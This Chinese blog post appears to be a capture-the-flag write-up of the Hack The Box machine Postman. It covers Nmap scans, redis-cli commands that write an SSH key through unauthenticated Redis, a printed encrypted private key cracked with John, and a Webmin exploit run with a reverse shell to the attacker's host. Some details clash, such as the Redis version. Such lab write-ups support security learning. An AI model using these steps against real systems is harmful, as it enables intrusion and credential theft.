HTB靶机 Postman 渗透测试记录

misaka19008 发布于 2024-11-13 15 次阅读

目标信息

IP地址:10.10.10.160

信息收集

ICMP检测

┌──(root㉿misaka19008)-[/home/…/Documents/pentest_notes/postman/nmap_reports]
└─# ping -c 4 10.10.10.160
PING 10.10.10.160 (10.10.10.160) 56(84) bytes of data.
64 bytes from 10.10.10.160: icmp_seq=1 ttl=63 time=861 ms
64 bytes from 10.10.10.160: icmp_seq=2 ttl=63 time=1255 ms
64 bytes from 10.10.10.160: icmp_seq=3 ttl=63 time=619 ms
64 bytes from 10.10.10.160: icmp_seq=4 ttl=63 time=1177 ms

--- 10.10.10.160 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3090ms
rtt min/avg/max/mdev = 618.839/977.934/1254.611/254.280 ms, pipe 2

攻击机和靶机之间网络连通性良好。

防火墙检测

# Nmap 7.94SVN scan initiated Thu Aug  1 08:42:03 2024 as: nmap -sF -p- --min-rate 2000 -oN ./fin_result.txt 10.10.10.160
Warning: 10.10.10.160 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.160 (10.10.10.160)
Host is up (0.25s latency).
Not shown: 65513 closed tcp ports (reset)
PORT      STATE         SERVICE
22/tcp    open|filtered ssh
80/tcp    open|filtered http
6379/tcp  open|filtered redis
10000/tcp open|filtered snet-sensor-mgmt
18136/tcp open|filtered racf
20282/tcp open|filtered unknown
28838/tcp open|filtered unknown
30807/tcp open|filtered unknown
33507/tcp open|filtered unknown
34831/tcp open|filtered unknown
34875/tcp open|filtered unknown
36258/tcp open|filtered unknown
36739/tcp open|filtered unknown
36816/tcp open|filtered unknown
36924/tcp open|filtered unknown
41405/tcp open|filtered unknown
47572/tcp open|filtered unknown
50734/tcp open|filtered unknown
52465/tcp open|filtered unknown
57905/tcp open|filtered unknown
60547/tcp open|filtered unknown
62355/tcp open|filtered unknown

# Nmap done at Thu Aug  1 08:44:31 2024 -- 1 IP address (1 host up) scanned in 148.11 seconds

靶机疑似开放了大量假端口,无法判断防火墙状态,直接进行TCP全端口扫描。

网络端口扫描

TCP端口扫描结果

# Nmap 7.94SVN scan initiated Thu Aug  1 08:53:58 2024 as: nmap -sS -sV -A -p- --min-rate 2000 -oN ./tcp_result.txt 10.10.10.160
Warning: 10.10.10.160 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.160 (10.10.10.160)
Host is up (0.39s latency).
Not shown: 65434 closed tcp ports (reset), 97 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-server-header: MiniServ/1.910
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 3.18 (94%), Linux 5.0 (94%), Linux 3.16 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 5.1 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   501.88 ms 10.10.14.1 (10.10.14.1)
2   502.05 ms 10.10.10.160 (10.10.10.160)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug  1 08:57:48 2024 -- 1 IP address (1 host up) scanned in 230.14 seconds

UDP端口开放列表扫描结果

# Nmap 7.94SVN scan initiated Thu Aug  1 08:59:26 2024 as: nmap -sU -p- --min-rate 2000 -oN ./udp_ports.txt 10.10.10.160
Warning: 10.10.10.160 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.160 (10.10.10.160)
Host is up (0.61s latency).
Not shown: 65165 open|filtered udp ports (no-response), 369 closed udp ports (port-unreach)
PORT      STATE SERVICE
10000/udp open  ndmp

# Nmap done at Thu Aug  1 09:05:37 2024 -- 1 IP address (1 host up) scanned in 370.96 seconds

**UDP**端口详细信息扫描结果

# Nmap 7.94SVN scan initiated Thu Aug  1 09:06:16 2024 as: nmap -sC -sU -sV -A -p 10000 -oN ./udp_result.txt 10.10.10.160
Nmap scan report for 10.10.10.160 (10.10.10.160)
Host is up (0.44s latency).

PORT      STATE SERVICE VERSION
10000/udp open  webmin  (https on TCP port 10000)
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   258.78 ms 10.10.14.1 (10.10.14.1)
2   258.90 ms 10.10.10.160 (10.10.10.160)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug  1 09:06:20 2024 -- 1 IP address (1 host up) scanned in 4.39 seconds

同时发现靶机操作系统为Ubuntu Linux,以及靶机6379端口运行Redis 4.0.5,存在严重的未授权命令执行漏洞。

服务探测

SSH服务(22端口)

端口Banner

┌──(root㉿misaka19008)-[/home/…/Documents/pentest_notes/postman/nmap_reports]
└─# nc -nv 10.10.10.160 22
(UNKNOWN) [10.10.10.160] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3

Web应用程序(80端口)

打开主页:http://postman.htb/

在源代码中未找到关键信息,直接扫描目录:

# Dirsearch started Thu Aug  1 09:37:05 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://postman.htb/ -x 400,403,404 -t 60 -e php,js,html,asp,aspx,txt,zip,tar.gz,pcap

301   307B   http://postman.htb/js    -> REDIRECTS TO: http://postman.htb/js/
301   308B   http://postman.htb/css    -> REDIRECTS TO: http://postman.htb/css/
301   310B   http://postman.htb/fonts    -> REDIRECTS TO: http://postman.htb/fonts/
301   311B   http://postman.htb/images    -> REDIRECTS TO: http://postman.htb/images/
200   557B   http://postman.htb/images/
200   661B   http://postman.htb/js/
200   829B   http://postman.htb/upload/
301   311B   http://postman.htb/upload    -> REDIRECTS TO: http://postman.htb/upload/

未发现任何关键信息。

Redis服务(6379端口)

尝试使用redis-cli工具直接登录Redis,发现靶机存在Redis未授权访问漏洞:

(丸辣.jpg)

Web应用程序(10000端口)

打开主页:https://postman.htb:10000/

发现靶机部署了Webmin操作系统远程管理工具,版本为v1.910。联网搜索该系统,发现该版本系统存在严重的命令执行漏洞CVE-2019-15107

根据文章描述,访问漏洞点password_change.cgi

成功发现靶机操作系统为Ubuntu Linux 18.04.3

渗透测试

Redis未授权写入SSH公钥

鉴于靶机Redis版本为4.0.9,且存在未授权访问漏洞,决定向Redis的默认工作目录/var/lib/redis下写入SSH公钥文件。(推测用户名为redis,写入文件为/var/lib/redis/.ssh/authorized_keys,由于Redis的特性,公钥内容开头和结尾处必须有2行空行):

(echo -e "nn";cat ~/.ssh/id_rsa.pub;echo -e "nn") > ./ssh_key.txt
cat ssh_key.txt | redis-cli -h 10.10.10.160 -x set evilssh
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh
redis-cli -h 10.10.10.160 config set dbfilename authorized_keys
redis-cli -h 10.10.10.160 save

写入成功!!!接下来直接登录SSH:

权限提升

移动至Matt用户

登录redis用户之后,在对靶机系统进行信息预收集时,发现在/opt目录下有一份名为id_rsa.bak的文件:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

发现为加密的SSH私钥,推测所有者为用户Matt。直接保存到本地,使用John工具配合rockyou.txt大字典进行破解:

ssh2john ./matt_sshkey > ./matt_keyhash.txt
john ./matt_keyhash.txt --wordlist=/usr/share/wordlists/rockyou.txt

破解成功!!口令为:computer2008。直接使用私钥登录SSH,失败,尝试使用破解出来的口令切换用户:

su Matt

成功!!

本地信息收集

基本系统信息

进程列表

计划任务列表

环境变量

用户信息

用户家目录

特殊权限文件

开放端口信息

敏感文件权限

经分析研判,发现靶机Webmin服务由root用户运行,且存在命令执行漏洞CVE-2022-0820,决定使用该漏洞提权。

Webmin漏洞利用

通过联网查询,成功找到了一份EXP

保存文章中的EXP,根据复现步骤执行命令:

./exp.py -t https://postman.htb:10000 -c Matt:computer2008 -LS 10.10.14.3:80 -L 10.10.14.3 -P 4444

提权成功!!!!

Flag文件展示

64661a0919a4f00f26133e6a698cfa22

本次靶机渗透到此结束

  • wechat_img
此作者没有提供个人介绍
最后更新于 2024-11-13
啥也没有呀